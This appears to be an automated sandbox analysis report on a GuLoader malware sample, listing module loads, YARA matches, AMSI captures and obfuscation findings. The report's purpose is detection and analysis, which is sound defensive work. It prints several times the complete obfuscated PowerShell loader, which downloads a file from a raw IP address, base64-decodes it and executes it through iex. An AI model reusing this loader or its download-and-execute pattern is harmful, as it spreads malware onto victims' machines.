Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 0000000A.00000002.20097370457.000000000AFA5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.20097330358.00000000090A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Perflation $Reintervention $Guldfatning), (Overcredit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ablastin = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tilsynsvrger)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Drikkelserne, $false).DefineType($caters, $R
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFB200800BD pushad ; iretd 6_2_00007FFB200800C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545DD push ss; retn 0008h 10_2_04C545E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545E7 push ss; retn 0008h 10_2_04C545F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C545F7 push ss; retn 0008h 10_2_04C54602
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C54607 push ss; retn 0008h 10_2_04C54612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C53AE1 push ebx; retf 10_2_04C53AEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C53AEF push ebx; retf 10_2_04C53AEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C5A227 push esp; retn 0008h 10_2_04C5A231
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C21AD pushad ; retf 0004h 12_2_232C223F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232CE060 push eax; retf 0008h 12_2_232CE06D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232CE074 pushfd ; retf 12_2_232CE075
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C97A1 push es; iretd 12_2_232C97A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F08CD push ecx; mov dword ptr [esp], ecx 12_2_232F08D6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E667FC push es; retf 14_2_06E667FD
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6ECCE push 0000006Eh; retf 14_2_06E6ECFA
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E738AE push eax; ret 14_2_06E738B0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6EC6C push es; retf 14_2_06E6EC78
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6E85D push FFFFFFB4h; iretd 14_2_06E6E8AD
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E64DD0 push ebp; retf 14_2_06E64DD1
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E65952 push ecx; retf 14_2_06E65961
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E61922 push eax; iretd 14_2_06E61936
